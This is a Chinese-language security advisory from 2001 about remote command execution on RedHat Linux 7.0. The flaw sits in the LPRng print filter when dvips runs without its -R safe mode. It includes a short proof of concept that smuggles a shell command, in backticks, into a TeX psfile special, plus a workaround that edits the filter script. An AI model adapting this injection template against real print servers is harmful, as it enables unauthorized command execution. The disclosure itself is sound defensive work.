发布日期：2001-08-28
更新日期：2001-08-29

受影响系统：

RedHat Linux 7.0

不受影响系统：

RedHat Linux 7.1

描述：

---

如果系统安装了tetex-dvips，而且在调用dvips命令时没有指定"-R"开关(安全本模式)，
那么攻击者可能利用LPRng来远程执行任意命令。

dvips程序用来完成强一个.dvi文件转换成.ps文件。在远程用户向目标系统的LPRng打印
守护进程提交一个.dvi文件的打印请求时，LPRng会将此请求交给过滤器dvi-to-ps.fpi
来将.dvi文件转换成.ps文件。攻击者可以构造一个恶意的.dvi文件，并在psfile部分中
输入包含shell元字符的任意命令，在dvips进行转换时，就会以lp用户的身份执行这些命
令。上述问题只有在dvips没有指定"-R"开关时才会存在。

<*来源：zen-parse （zen-parse@gmx.net） *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

zen-parse （zen-parse@gmx.net） 提供了如下测试代码：

cat >proof-of-concept.tex <<EOF
\special{psfile="`touch /tmp/lpowned"}
\end
EOF
tex proof-of-concept
lpr proof-of-concept.dvi



建议：

---

临时解决方法：

编辑文件：
/usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi

找到下列语句：
dvips -f $DVIPS_OPTIONS < $TMP_FILE

将其变成：

dvips -R -f $DVIPS_OPTIONS < $TMP_FILE

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.redhat.com/support/errata/index.html


浏览次数：5009
严重程度：0（网友投票）